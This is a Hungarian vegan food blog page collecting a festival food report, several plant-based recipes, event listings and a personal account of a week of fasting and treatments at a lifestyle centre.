Idén is ellátogattunk az augusztus huszadikai programok keretén belül az Magyar Ízek Utcájába. Az utca jó hosszú volt, de a tavalyihoz képest - szerintem - kevesebb árus jött el portékáját bemutatni, árulni. Tavalyi kedvencem - a flódnis "sütöde" viszont jelen volt. Mivel előző évben nagyon ízlett ez a zsidó konyha remeke, így idén is megkóstoltam. Vagy az én ízérzékem változott, vagy a recept, vagy mert nem volt langyos sem, csak hideg a sütemény, de ebben az évben nem jött be annyira. Szerintem az állaga sem volt olyan sikeres, mint tavaly.
Ha már édesség... idén is voltak aszalt gyümölcsökből készült édességek standjai. Idén is kihagytam a vásárlását. Tartok tőle, hogy annyira édes lenne, hogy nem tudnék 5 dkg-ot sem elfogyasztani. Máskülönben, ha lenne ingyenes falat kóstolóként, kipróbálnám és lehet, hogy tévednék. Marketing kérdés is - legalább is a cégnél az lehetne. Ezt különben tavaly is így gondoltam. Persze, megértem, ha nincs erre financiális kapacitás náluk. S igazából még aprócska kérdéseim voltak velük kapcsolatban, azonkívül, hogy a méhecskék szeretettel repkedtek rajtuk, mégpedig az, hogy nem láttam nagyon az összetevők listáját. Vajon cukor hozzáadásával készülnek? És a színezékeket hogy oldják meg? Na és a zselés állagúakat miből készítik? (Nem akadékoskodok, ezek felmerültek benne, mint esetleges vásárlóban.)
De volt egy kisebb stand, ahol egyszerű portékát árultak: fűszeres tökmagot. Fokhagymás, paprikás, csilis, olívaolajas és kókuszos-fahéjas (ez utóbbi az édesszájúak számára) ízekben. A kedves árusok nem sajnálták megkóstoltatni a néppel a tökmagokat. Ez volt az igazi reklámfogás. Minket jól megcélzott.:) Férjemnek alig kellett unszolnia, vettünk is két fajtát. Mire bejártuk az "utcát" jól megrágcsáltuk a kis zacskó tökmagokat.
S hogy ezek a magyarok mit ki nem találnak egy gasztro-fesztivál alkalmával! Tudniillik azt, hogy fatüzelésű sparhelten sütötték a tésztát (talán kenyérlángos vagy valamilyen lepény volt?). Ötletesnek tartottam, s ha húsevő vagyok, bizonyára megtalálom a számomra ízletes falatokat itt, akkor is, ha a legolcsóbb termékük 900 forintnál kezdődött.
A másik, ami számomra tetszett, egy helyen hatalmas méretű pogácsákat árultak. (300HUF) Szépek és nagyok voltak a pogik. Sajnos csak két fajta volt (legalább is, amikor ott jártunk): tepertős és néhány sajtos. Na hát mondanom sem kell, hogy a tepertős pogikat egész életemben nem kedveltem. Ha lett volna magvas - mondjuk napraforgó, tökmag, szezámmag trióval, vagy paprikás (igen, én már korábban készítettem ilyet, mikor még nem blogoltam), akkor talán veszünk egyet, bár méretét tekintve négy embernek is elég lett volna egy.
Pékáruk kapcsán megemlítem még az olívabogyós kenyérkét, ami jópofa volt. Árat nem láttam kiírva (attól még lehetett), és a megkóstolást is kihagytuk. Viszont egy helyen (nem tudom, hogy ugyanitt-e), szintén kóstolót osztogattak - paradicsomos - csilis kenyér falatkákat. A kis falat kenyérke jó fűszeres volt. Mindkettővel - olívás és aszalt paradicsomos - már én is próbálkoztam, bár ez szintén nem található (még) a blogomon, pedig sikeres volt. (Olyan gyorsan elfogyott, hogy nem tudtam lefotózni.)
Azért meg kell hagyni, a vegákra is gondoltak az egyik "főttétel" pultnál. Valami húsféléket sütöttek és árultak, s nagy örömömre az alábbi három salátafélét is választhatta az arra járó.
Zárásként pedig jöjjön néhány kenyérről, péktermékről készült kép, ha már augusztus 20. ennek is az ünnepe.
Barackos tejberizs
"A beszéd nem főzi meg a rizst". Érvelnek a szólással amellett, hogy a művelt embernek is szüksége van élelemre (és némi kétkezi munkára). Földünkön mintegy hárommillió embernek ad megélhetést a rizs. A rizs a világon a legrégebb óta termesztett gabonafajta. Jelenleg is több száz országban ültetik és aratják. A világ gabonatermésének a 30%-át a rizs adja. A világ rizstermésének mintegy fele olyan vidékről származik, amelyet teljes mértékben kézi erővel művelnek meg.
Mindezek után lássuk a receptet, mert a szövegelés nem főzi meg a rizst. :)
A recept:
Hozzávalók:
- 20 dkg barna rizs
- víz
- 3-4 dl növényi tej
- 3-4 db nektarin
- 6 db sárgabarack
- xilit/stivia/barnacukor/gyümölcscukor ízlés szerint.
Elkészítés:
A barna rizs szemeket átmossuk, majd annyi vízben, ami jól ellepi, majdnem puhára főzzük. Az így megfőtt rizshez növényi tejet vagy növényi tejszínt adunk, és most már addig főzzük, míg a rizsszemek teljesen megpuhulnak, tehát a folyadékot magába szívja a rizs. Édesítjük ízlésünknek megfelelően.
A barackokat megmossuk, felkockázzuk és a megfőtt tejberizshez keverjük. Télen használhatunk barackbefőttet is. Kipróbálhatjuk, hogy reszelt citrom- vagy narancshéjat adunk az így elkészült rizshez. Igazán különleges ízt ad neki. Kikapart vaníliát is adhatunk hozzá.
Tálalásnál megszórhatjuk a tetejét kókuszreszelékkel, egy kisebb szál mentát tűzhetünk a közepébe. Hidegen és melegen is finom. Kínálhatjuk desszertként vagy fogyaszthatjuk édes reggeliként.
Ananász sorbet
2013. augusztus 7. La Veganista
Az igazi sorbet, más néven jégkása igazi vegán édesség. Semmi mást nem tartalmaz, mint gyümölcsöt és jeget. A nyári kánikulában úgy hűsít, hogy nem terheli a szervezetünket fölösleges kalóriákkal. Ha ananásszal készítjük el, C vitaminban gazdag, emésztést segítő frissítőt fogyaszthatunk. Hozzávalók:
- 1db érett, hűtött ananász (ne használjunk konzerv ananászt)
- 1-2 pohár jég
- 1-2 evőkanál frissen facsart citromlé (elhagyható)
Így készítsd el:
- Tisztítsd meg az ananászt, ha fás a közepe, távolítsd el. A gyümölcs húsát kockázd fel.
- Turmixgépben aprítsd fel a jeget, majd add hozzá a felkockázott ananászt és a citromlevet.
- Tálald a sorbetet kisebb tálkában, vagy pohárban mentalevéllel díszítve.
Őszibarack krémleves kesutejszínnel, főzés nélkül
Imádom a nyers krémleveseket, a kesutejszínnel egy tejmentes, selymes, krémes levest kapunk.
Bármilyen más gyümölcsből elkészíthető.
További finom ötletadó nyers gyümölcslevesek a blogon:
Citromos – fahéjas almaleves
Barackos sárgadinnyekrémleves
Fahéjas szilvakrémleves kesutejszínnel
Hozzávalók: őszibarack vagy nektarin, egy marék kesudió, víz, méz (vagy xilit vagy stevia), citromlé (valódi citrom leve)
Elkészítés: A kesutejszínt elkészítjük: kesudiót turmixolunk vízzel, de annyira, hogy teljesen krémes legyen, ne maradjanak benne darabok. Az elkészült kesutejszínt tovább turmixoljuk az őszibarackkal, ezt is teljesen krémesre.
A végén ízesítjük: édesítjük mézzel illetve savanyítjuk citromlével.
Jó étvágyat!
Eleki élménybeszámoló 2013 - 1. rész
Ezen a nyáron is részt vettünk egy turnuson az Eleki Életmódközpont szervezésében. Most már azért beszélhetek többesszámban, mert férjem is velem tartott, illetve tavaly nyáron megrendezett turnusról nem csak én voltam a visszatérő, hanem akkori szobatársam, illetve egy harmadik "páciens" is, akit akkor dohányzásleszokásban és pánikbetegségben segítettek. Ezen felül volt szobatársam testvére is eljött, valamint jelen volt betegként az egyik kezelő édesanyja is. Továbbá megismerhettünk ott egy osztrák férfit, aki sajnos daganatos betegség miatt érkezett. Összesen 10 vagy 11 kezelt volt. Kezelő valamivel kevesebb, mivel az én kezelőm, illetve férjem kezelője is két-két beteget gondozott a turnus ideje alatt. Tavalyi kezelőm jutott nekem idén is. Hadd ne mondjam, profi a lány :). Csak "főállás" mellett jár el egy-egy turnusra kezelni, de szerintem ezt kellene inkább csinálnia, mert kevés olyan ember létezik, akinek ösztönösen működik az az érzéke, hogy mire van szüksége a betegnek. Na persze, ehhez hozzájárul az is, hogy van rá figyelme, és időt szakít a kezelendő páciensre. Szóval ismét a legjobbat kaptam. Persze nem mondhatom, hogy kizárólag ő a legjobb. Az ott szolgálatát teljesítő röntgen orvos felesége is kezelő. Megfigyeléseim szerint ő is hasonlóan kimagaslóan jó lehet. Na de igazából nem a kezelőkről szeretnék regélni, hanem megpróbálom most azt a 7 napot rövidebben elmesélni, mint tavaly.
Tehát a turnus ugyan vasárnap délután kezdődött, azonban régi jó barátom egy vidéki kis városban végre beadta a derekát és megnősült. Az ő esküvőjére voltunk hivatalosak vasárnapra, így mi csak hétfőn érkeztünk Elekre. Jól is jött így ki, mert az esküvői torta megkóstolását nem szerettem volna kihagyni.... mondjuk Elek után egy héttel. Arról nem beszélve, hogy ez nem hogy nem vegán, de nem is vegetáriánus esküvői vacsora volt. Nyilván ez nem is elvárás, hiszen vegák is alig voltak. (Bár a vőlegény már évtizedek óra az, felesége tudomásom szerint nem.) Persze azért gondoltak ránk, növényevőkre is...:) S hát ami a sütiözönt illeti... ah... szóljanak inkább a képek a szöveg helyet..
Khm...:) Tudom,
az édességekből több a kép,
mint az eleki élményekből...:)
Ez csak az emberi mivoltom...:)
A torta finom volt, és másnap, hétfőn már azzal az elhatározással ébredtem valamikor hajnali 4 órakor, hogy igen, akkor most jöhet a böjt. Tegnap megvolt a "búcsútorta", ma pedig akkor marad csak a víz, ásványvíz, esetleg enyhe, citromos víz, hacsak másképp nem rendelkeznek az orvosok Eleken.
Korán keltünk, időben indultunk, így egész szép időn belül odaértünk. A délután esedékes orvosi megbeszélésig könnyedén elhelyezkedtünk szobánkban. Azt a szobát kaptuk, amiben tavaly én aludtam.
A konzultáció három orvossal zajlott. Horsly, aki Amerikából van itt hazánkban már 2 éve, továbbá egy férfi és egy nő orvos volt. Ezenkívül az amerikai orvos felesége is jelen volt. Valamint természetesen a kezelő. Szóval alapos konzílium volt. Elsőnek az én állapotomat beszéltük át, majd férjemét. Mindketten ott voltunk egymás megbeszélésén. Nem kíváncsiságból elsősorban, hanem, hogy a jövőben mire, hogyan kell figyelnünk egymás életében, stb.
Az orvosi tanácskozásokat követően máris kezeléseket kaptunk. Mindketten gőzpakolást. Férjem most részesült először gőzpakolásban, én pedig már nagyon vártam, hogy ismét ilyen jó dologban legyen részem.
Este én már nagyon gyenge voltam - mivel egész nap nem ettem. (Férjem ott ebédelt, és elindulás előtt reggelizett is.) Így az esti témára nem mentem be. Helyette egy jót aludtam.
Másnap korán ébredtem, mivel előző nap nem ettem, nem volt nagy szükség alvásra sem. 5-kor már éber voltam. S éreztem, hogy nem vagyok éhes! Örültem neki, így elhatároztam, hogy megpróbálom ezt a napot is böjttel kibírni. Ugyan az orvosok azt mondták, nem szükséges, de én örültem, hogy orvosi felügyelet alatt folytathatom le és aránylag jól bírom. Előző nap volt szobatársam említette, hogy ő sem eszik, így gondoltam, szolidaritást vállalok és vele együtt nem eszek. :) Nos még aznap férjemmel elmentünk sétálni (ő nem böjtölt, táplálkozott rendesen!). Emlékeztem tavalyról, hogy a böjtnap vége felé bár gyenge voltam, de egy jó sétát követően a legnagyobb melegben is erőre kaptam. Ezt vártam most is. Nos nem következett be. Már nagyon gyenge voltam, hiszen ez a második "kajamentes" napom volt. (Hangsúlyozom, önként választottam, nem is önsanyargatásból, hanem éreztem, a testemnek ez jól esik.) Hazaérve még épp letusoltam és elaludtam. Másnap reggel már természetesen táplálkoztam. Nagyjából 60 órát töltöttem el úgy, hogy ételt nem vettem magamhoz. Aztán a harmadik nap reggelén már kaptam is a zöld turmixot, majd valami könnyű kis salátát, hogy ne legyen nehéz a gyomromnak. Kértem, hogy se fűszer, se só, se citrom, se olaj ne legyen a salátán. (Éhgyomorra, hosszabb kajamegvonás után jobbnak tartottam, ha natúr ízekben részesülök.)A nagyobb mozgáshoz még mindig gyengécske voltam. Időközben kaptam gyógyteát is - úgy egy litert, amit el kellett kortyolgatnom napközben. Az ebéd is lezajlott, majd ismét gőzpakolást kaptam. Előző napiakhoz képest ez esett a legjobban eddig. S közben elterveztük, hogy az utolsó kezelési napon lázterápiát is kapok. Férjemmel együtt okosodtunk az előadásokon, élveztük a gőzpakolásokat testünkön, majd a mobilizációs masszázsok is jól estek. A szuper még az volt, hogy az osztrák férfivel, az amerikai orvossal és gyermekeivel angolul tudtunk beszélgetni. Jó volt újra használni az "english-t". :)
Az osztrák férfival kapcsolatban érdekes dolgot éltem meg. Első alkalommal vegyesen beszéltünk hol német, hol angol, hol magyar mondatokkal. (Valamennyire azért ő is tud magyarul.) Furcsa érzés kerített hatalmába. Ugyanis a nyakán sajnos látszanak a duzzadt részek, meglehetősen könnyű észrevenni. Én ott szembesültem először ezzel a látvánnyal közelről - face to face. Megrettentem, megijedtem, megrémültem. - Keresem a szavakat rá, hogy kifejezzem, mit éreztem amellett, hogy erősen együtt éreztem vele. Kevés olyan emberrel találkoztam életem során, akiknek így látható jelei vannak a betegségeiknek. (Pedig alapjában nem volt sebes, se csúnya, "csak" dagadt a nyakának az egyik oldala.) Ahogy a vér látványától (még a saját sebemen is, ill. korábban vérvételeken is) képes vagyok rosszul lenni, elájuláshoz közeli állapotba kerülni, úgy ez is egy rövid időre rosszullétet keltett bennem. Sajnálom, mondtam neki, és jeleztem, hogy muszáj kimennem, mert itt helyben rosszul leszek (főleg, hogy kaja az első beszélgetésünkkor még nem volt bennem). Szerencsére mindenféle erőltetés és erőlködés nélkül rövid időn belül túltettem ezen magam, és a turnus végén már hármasban, férjem, ő és én mentünk el sétálni, beszélgetni. Megkedveltük őt mindketten. Jó lenne, ha a kezelések és az intenzív életmódváltás visszafordítaná ezt a végzetesnek tűnő betegséget. Elszorul a szívem, ha az állapotára gondolok. Milyen jó lenne, ha még jó néhány évet egészségben élhetne...!
Róla még szándékozom írni a későbbiekben (más bejegyzésben), de most visszakanyarodok a kezelésekhez. Konkrétan a lázterápiához. Férjem második napunkon részesült lázterápiában. 38,4-ig ment fel a láza, tovább nem. Ezen a hőmérsékleten tartották egy ideig, majd a szokásos langyos, vagy hideg vizes lemosás, ágyban fekvés, izzadás következett. Jól bírta, ahhoz képest is, hogy elsőnek kapott profi lázterápiát. Én az utolsó kezelési napomon részesültem benne. Tavaly 38,7 -re elég gyorsan felszökött a lázam, s gondoltam, ez most is talán így lesz. Hiába szálltam be a 43 fokos vízbe, valahogy csak 38-ig jutott feljebb a lázam. Majd újra és újra engedtünk még jó meleg vizet a kádba. (Rajongok a forró vizes fürdőért télen és nyáron egyaránt!) Így végül eljutottunk a tavalyi 38,7 magasságig. Ott tartottuk kb. 20-30 percig, majd vízleengedés, hidegebb zuhany, kiszállás, bebugyolálás, felmenetel volt a terv. Ahogy azonban szép lassan kiszálltam a kádból (tavaly nagyon kis virgonc voltam, sokkal könnyebben ment az egész), éreztem, hogy vagy leülök, vagy elszédülök. Szóltam, s szerencsére karnyújtásra volt a kezelőszobában a masszázságy, így oda ültem, majd feküdtem. Ekkor már férjem is bekukucskált, és fekvő helyzetemben megemelte a lábam, míg kezelőm is próbált segíteni, vizet adni, hideg borogatást adni, stb. Ahhoz képest, hogy tavaly milyen könnyedén eljutottam a szobámba, most úgy 10-15 percet csak feküdtem a masszázságyon, hogy magamhoz térjek. Sikerült. Így miután szobámba mentünk, melegbe bugyolálva ágyfekvés következett, úgy fél órán keresztül. Folyt rólam a víz az ágyban. Kaptam is utánpótlást. Szívószállal szürcsöltem a vizet.:)
Tavaly egészen máshogy élten meg a lázterápiát. Könnyedebben. Ennek ellenére most is nagyon örültem neki és élveztem. Külön tetszett, hogy az előkészített ágyban folyt minden testrészemen rólam a víz. Méregtelenítettem.
Nem tudom, ennek köszönhetem-e, de az elmúlt téli időszakban bizony kimaradt az, hogy egy hétre lerobbanjak és nagyon belázasodjam. Ugyan el-el csíptem kisebb megfázást, de igazából a szokotthoz képest gyorsabb leforgással és könnyebben átment rajtam.
Zöld turmix recept, augusztusi nyers vegán programok és balkon-kert körkép
2013. augusztus 2. Répa Konyha
Egy egyszerű zöld turmix recept: 1 nagyobb mángold levél felvagdosva (hogy a rostjai ne tekeredjenek a turmixgép késére) néhány salátalevél fél marék magozott, érett sárgabarack 0.5-1 dl szűrt víz (attól függően, hogy milyen hígra szeretnéd a turmixod) én raktam még bele: 1 teáskanál Acai bogyó port (a Superfoodstól) 1 teáskanál hántolt kendermagot (szintén a Superfoodstól) Néhány tipp: ? Először a vizet és gyümölcsöt rakd bele a turmixgépbe, így könyebb dolga lesz a gépnek ? A sárgabarack édes-krémessé teszia turmixot, de sárgadinnyét is rakhatsz bele ? A legjobb, ha minden, amit eszel, vegyszermentes/bio. De legalább a zöld levelek legyenek megbízható forrásból! Találkozzunk! Helyszínek és időpontok nyers vegán programokhoz Augusztus 07. Szerda 12.00 Raw Food Energy workshop - Chambok ház Ozora Fesztivál Augusztus 15. Csütörtök 18.00 ÉletKonyha nyers vegán születésnapi vacsora Augusztus 24-25. Egészségvár Vegetariánus fesztivál Szombaton 13:40-14:40 között bemutatót tartok: Téma: Egészséges reggelik - nyers vegán módon. Turmixok, növényi tej házilag, reggeli energiaforrások. Keressd asztalunkat, ahol a Sületlenségekkel és nyers vegán alapanyagokkal várlak majd! Augusztus 31. (szombat) Nyíregyháza rendezvény az élő ételek előadás és ételkészítő bemutató - Ingyenes! www.okocsoda.hu ZAJLIK AZ ÉLET A BALKONON IS Néhány kép az ehető kertemről... Petrezselyem és bazsalikom Citromfű Bazsalikomból sohasem elég! Nem szeretik a pangó vizet! Elbújtam... Kedvenc játszótársam a szél Rozmaring, saláta magnak, bíbor mángold Körte alakú paradicsom vagyok
Spenótos-paradicsomos lasagne
A cukkínik megállíthatatlanul nőnek a kiskertemben, én meg igyekszem minél több féle ételt készíteni belőle Képzeljétek, az én cukkínim enyhén fűszeres ízű simán is Imádom ? Szerencsére ugyanolyan sokoldalú, mint a téli kedvencem, a csicsóka Akár sósan, akár édesen is elkészíthető, sosem okoz csalódást ? Hozzávalók: 1 pici cukkíni 1 szelet diósajt (recept itt: http://eletkert.wordpress.com/2013/07/31/diosajt/ […]
Kókuszos-csokis, erdei gyümölcsös nyers torta (tej-, tojás-, és cukormentes)
Júniusban ünnepeltük Anyukám (63.:) születésnapját, és ahogy az már megszokott, én készítem ilyenkor a tortát neki.:) Az elmúlt években pedig, amióta már 70-90%-ban nyers ételeket fogyaszt, a torta nyers változatban készül. Idén a Facebookon találtam rá egy rendkívül mutatós tortára, amit egy costa ricai vegán séf, Eric Rivkin élő ételes szakácskönyvében találtam. Egy dél-amerikai szerzőről lévén szó, a hozzávalók egy része is a földrajzi sajátosságokat tükrözi, így kicsit kénytelen voltam variálni a recepten. A friss kókuszdió helyett például többnyire szárított kókuszreszeléket használtam, és ettől az állaga kicsit darabosabb lett. Nem volt itthon útifűmaghéj, ezért nem sikerült elég szilárd állagúvá varázsolni a krémet, így viszonylag folyós maradt. Emiatt maradt rajta a tortaforma pereme is a fotózásnál, mert inkább kanalaztuk, mint szeleteltük.:) Az íze összhatásában viszont isteni, nagy sikert aratott családon kívül és belül, ezért mindenképpen felteszem ide a blogra! A krémjét akár kanalas-poharas édességként is lehet fogyasztani! És amilyen bonyolultnak tűnik a hosszú leírás alapján a recept, higgyétek el, nem az, nagyon egyszerű!:) De tényleg!:) Az egyes rétegek édességét én mindig kóstolással ellenőriztem, és amikor úgy ítéltem meg, hogy nem elég édes, akkor agave sziruppal utánaédesítettem. Az eredeti torta így nézett volna ki, de mivel már időhiányban voltam a végére, ezért okos módon elfelejtettem az epreket a szélére beletenni...:/ Mondjuk úgyis folyós lett a végeredmény, így végül nem is volt jelentősége...:D És ha további nyers torta csodákra vágytok, ajánlom Nektek pl. Erika blogját! Kókuszos-csokis, erdei gyümölcsös nyers torta Hozzávalók (egy 20 cm-es kapcsos tortaformához): 1 bögre = kb. 250 ml A torta alap 1 bögre mandula, vagy pekándió, beáztatva 2 órára és lecsepegtetve, megszárítva 1 bögre friss, vagy szárított, finom kókuszreszelék 1/2 bögre magozott datolya (én kicsit be is áztattam, majd lecsöpögtettem) 1/2 bögre kakaópor 1/4 tk. őrölt fahéj csipet őrölt bors (én kihagytam) Konyhai aprítógéppel aprítsuk fel morzsás állagúra és keverjük össze a hozzávalókat. Kókuszos krémtöltelék 2 bögre aprított friss kókuszbél (nálam maradt a kókuszreszelék, amit beáztattam, és utána jól kinyomkodtam) 5 db jó érett banán 1/4 bögre kókuszolaj 4-5 darab magozott medjool datolya (nálam maradt a sima datolya) 1/2 tk. vaníliaőrlemény, vagy egy vaníliarúd kikapart belseje Turmixoljuk össze aprítógépben a hozzávalókat, amíg finom krémes állagot kapunk, majd tegyük a hűtőbe. Megjegyzés: itt a krémnél, mint utóbb kiderült sokat számított volna az útifűmaghéj hozzáadása...! Legalább 3 evőkanállal tennék hozzá, hogy ne legyen folyós a krém! A krém végleges édessége pedig függ a banántól, kóstold meg, és ha nem elég édes, esetleg agave szirupot adhatsz hozzá! Csokimáz a tetejére 1 bögre friss kókuszbél (maradt a kókuszreszelék) 3 ek. kókuszolaj 1/2 bögre kakaópor 3 db magozott medjool datolya 3 db fekete füge (nálam sima füge) 1/2 tk. vaníliaőrlemény, vagy egy vaníliarúd kikapart belseje 1/4 tk. őrölt fahéj csipet őrölt bors (én kihagytam) Mixeljük össze aprítógépben a hozzávalókat, amíg egy sűrű, sima krémet nem kapunk. Tegyük be a hűtőbe. Megjegyzés: itt a kókuszreszelék miatt kicsit darabos marad a máz. Ha mégis friss kókusszal dolgozol, akkor gondolom, ez elkerülhető! Minket nem zavart, de jobb ha tudsz róla!:) Fontos!: ahhoz, hogy szilárdulás után ne csomósodjon be a kókuszolaj a mázban, közvetlenül az elkészítés után tedd be a fagyasztóba kb. 1/2 órára, vagy akár kevesebbre! Díszítés 1 bögre vegyes bogyós gyümölcs 1 tk. agave szirup, vagy más növényi édesítő (sztívia, juharszirup, stb.) mentalevelek (elhagyható) Az eperöntethez turmixoljuk össze a növényi édesítőt néhány szem eperrel. Öntsük 6-8 darab nagy szemű, vékonyra szeletelt eper A torta összeállítása: 1. Nyomkodjuk a tortaalap masszáját a kókuszolajjal vékonyan kikent kapcsos tortaforma aljára. 2. Szedjük le a szárát, majd hosszában vékonyan szeleteljük fel az epreket, és a szélesebb felükkel kifelé nyomjuk a szeleteket a tortaforma pereméhez végig belül. A kisebb szeleteket felhasználhatjuk a díszítéshez. 3. Öntsük rá az alapra a kókuszos krémet. 4. Tegyük be a tortát a fagyasztóba 2 órára, hogy jól megszilárduljon! 5. Öntsük a tetejére a csokimázat, és tegyük be a hűtőbe, vagy a fagyasztóba, amíg megszilárdul! 6. Tálalás előtt tedd rá a gyümölcsöket, öntsd le az eperöntettel és díszítsd mentalevelekkel.
Őszibarackos lucernakoktél
Elnézést a késlekedésért, de sűrűk a napjaim mostanában Csinálom a kertet, fonom a kosárkákat, zajlik az élet ? Itt sorakoznak a fotók, csak kevés az időm publikálni Ez a lé nem fog a kedvencek közé tartozni, kis változtatásra szorul. De lehet, hogy csak azért, mert a baracknak semmi íze nem volt Hozzávalók: 2 őszibarack 1 […]
Grillezés - Nyár Egészségesen!
2013. július 16. Fittanyuka Blog
A grillezés, sütögetés baráti vagy családi környezetben a nyár elengedhetetlen tevékenysége. Ilyenkor előtérbe kerülnek általában a különféle húsok, kolbászok, sült szalonna. Mi van azokkal akik nem szeretnének ilyen ételekkel élni, számukra sem kell lemondani a grillezés és a finom falatok öröméről?! Ebben a nyári összeállításban nekik, nektek szeretnék segíteni, ötleteket adni. Az én tapasztalatom, hogy ha ilyen ételeket készítettem a társaságnak a hagyományos grill ételek mellett, rendkívül gyorsan elfogytak a mindenevők körében is. Ilyenkor a kedvenceim, mint mindig a nyári, friss zöldségek, grillezve, saslikon, növényi krémek, amelyeket salátákkal vagy tortilla chipszel is mártogathatunk, vagy éppen a grillezett zöldségek mellé kanalazzuk. Csupa - csupa növényi összetevőkből hatalmas grill-lakomát csaphatunk:)! Fűszeres olajban pácolt Grillezett zöldségek: Hozzávalók: Baby cukkini, champion gomba, paradicsom, hagyma, padlizsán, citrom karikák, paradicsom, paprika és folytathatnám a sort... Fűszeres olaj elkészítése: Zöldség mennyiségtől függően : kb. 2 dl hidegen sajtolt olíva olaj 1 - 2 kk himalaya só 2-3 cikk préselt fokhagyma 1/2 kk őrölt fekete bors 1/2 kk szárított vagy friss kakukkfű késhegyni füstölt, csípős piros paprika 1/2 kk szárított vagy friss majoránna 1/2 citrom leve A hozzávalókat összekeverjük. A zöldségeket megmossuk, a baby cukkinit, paprikát hosszában a padlizsánt, paradicsomot, citromot karikára felszeleteljük és egy edényben sorba lefektetjük őket majd ráöntjük a fűszeres olajat, megforgatjuk benne a zöldségeket és egy órára a hűtőbe tesszük. Innen már a grill rácsra vagy lapra kerülhetnek közvetlenűl. A saslikra szánt felkockázott hagymát, padlizsánt, cukkinit, gombát is pácolhatjuk előtte ebben az olajban, sokkal ízletesebb lesz a sütés után. A salikra tehetünk még felkockázott füstölt tofut, tönköly fehérjét, amelyeket szintén pácolhatunk. Mexikói babsaláta: A babfélék is nagyon jó fehérje források, jól illenek a többi zöldséghez. Az alábbi saláta finom, lehűtve fogyaszthatjuk a grill zöldségek vagy a saslik mellé is. Amikor salátát készítek vörös vagy tarka babból nem szokta bajlódni a főzéssel. Konzerv babot vásárolok, általában nem tartalmaznak a són, vizen és citromsavon kívül más rossz adalékot. Előfordul, hogy tesznek hozzá cukrot, azt visszateszem a polcra és keresek olyat amiben nincsen cukor. Hozzávalók: 240 g tarka, vörös vagy fehér bab 1-2 db piros kaliforniai paprika 1 fej lilahagyma 3-4 db paradicsom 1 cikk fokhagyma Dresszing: 3 evőkanál hidegen sajtolt szezám olaj, 1 citrom leve, 1 kk himalaya só, kevés őrölt zöld bors. A paprikát, hagymát, paradicsomot felkockázzuk, összekeverjük a babbal, a préselt fokhagymát pedig hozzáadjuk a dresszinghez, amelyet egy kis befőttes üvegben alaposan összerázunk. A salátára öntjük és jól behűtjük. Tálalhatjuk mángold leveleken, fűszeres olajban pácolt, pirított tofu kockák társaságában, kisebb kupacokban... A növényi krémek variációira már számtalan receptet osztottam meg veletek, az általam legkedveltebbek a következők: csicseriborsó krém - humusz, tahini - szezám krém, avokádó krém.. Még több krém recept itt! Nem utolsó sorban egy könnyű, hűsítő, alakbarát finomság: Gyömbéres - Citromos Görögdinnye sorbet: A dolgunk nagyon egyszerű: Fogunk egy finom, édes, friss görögdinnyét amelyet amennyire csak tudunk kimagozunk és turmixgépbe kanalazzuk a belsejét, hozzáadunk 1 citrom levét, egy kisebb darab friss gyömbért belereszelünk, 1/2 kk őrölt bourbon vaníliát teszünk hozzá és alaposan összeturmixoljuk. Szerintem ha elég édes a dinnye nem szükséges édesítés, ha mégis igényli akkor kevés steviával édesíthetjük. Üres joghurtos pohárkákba, vagy szilikon fagyi formákba öntjük, fa pálcikát állítunk a közepükbe és lefagyasztjuk. Fagyasztás után forró vízbe mártjuk őket egyenként és így könnyen kihúzhatjuk a pohárkákból. És egy ráadás: Kiwi - avokádó hűsítő, nyári shake: Hozzávalók: 4 db kiwi 1 db puha avokádó 200 ml kókusztejszín 1/2 narancs leve 2 evőkanál folyékony stevia 1-2 maréknyi jégkocka kevés friss, reszelt gyömbér erjedésgátlónak A lehéjazott kiwit és avokádót a többi hozzávalóval alaposan összeturmixoljuk. Fittanyuka
Hideg sárgadinnye koktél
Azt hiszem ebben a melegben nektek is jól fog esni ez a méz édes, hideg koktél Hozzávalók: 1/2 zöld húsú sárgadinnye 2 dl forrásvíz Homogénné turmixoljuk, és elkortyolgatjuk A sárgadinnye élettani hatásai A sárgadinnye számos vitamint és ásványi anyagot tartalmaz, gyógynövényként is ismert. Finom, édes ízével nyaranta meghatározója étrendünknek. Ehetjük lehűtve, felkockázva, gyümölcssalátaként, vagy készíthetünk […]
Lencsés quinoa-hajók vörös káposztával
Ez a recept nem éppen a legnyáriasabb ízek közé tartozik, de nagyon dekoratív és különleges tud lenni mondjuk egy jó kis vegán(s) svédasztalon. Vagy önmagában könnyű, de laktató vacsoraként.:) Szóval, semmiképp sem akartam, hogy feledésbe merüljön a receptje, így megosztom Veletek!:) Lencsés quinoa-hajók vörös káposztával Elkészítési idő: kb. 30 perc Hozzávalók: 3-4 főre 200 g quinoa 550 ml szénsavmentes ásványvíz tengeri só 200 g vörös káposzta, vékony csíkokra szelve 2 ek. lágy ízű repceolaj (nálam olívaolaj) 130 g főtt zöld lencse (nálam sima barna lencse) 2 csipet őrölt sáfrány őrölt fekete bors néhány levél fehér káposzta A szójajoghurtos öntethez: 120 g natúr szójajoghurt 1 ek. zöldcitromlé tengeri só 40 g sötét mandulakrém (én ezt kihagytam...) A quinoat egy finom szűrőn keresztül, folyó vízben alaposan átmossuk. Feltesszük főni a vízzel és 1/2 tk. sóval, majd erős tűzön kb. 17 percig főzzük, amíg teljesen elfő a víz alóla. Az olajat felforrósítjuk egy serpenyőben, és a vörös káposztát 3-4 percig pirítjuk benne. Hozzáadjuk a quinoat és még 3 percig együtt pirítjuk. Beleöntjük a lencsét, a sáfránnyal, sóval-borssal fűszerezzük. Néhány levél fehér káposztát megtöltünk a lencsés quinoa keverékkel. Az öntethez a szójajoghurtot a citromlével és a sóval ízesítjük. Végül a barna mandulakrémet óvatosan villával belekeverjük, hogy márványos legyen a teteje (én ezt egy kis rászórt őrölt piros paprikával oldottam meg:). Forrás: Attila Hildmann: Vegan for Fit
Lét-tudatos nevelés
2013. július 4. Lét-tudatos konyha
Kis szünet után ismét frissül a Lét-tudatos nevelés! Életképek, rövid írások a mindennapjainkról: Vidéki, természetközeli élet, 4 gyermek: 14 éves nagylány, 11 éves fiú és egy 7,5 éves lány ikerpár nevelése. Egészséges táplálkozás, természetes életmód, kertészkedés, lelki és szellemi értékekre való törekvés.
Csokis muffin
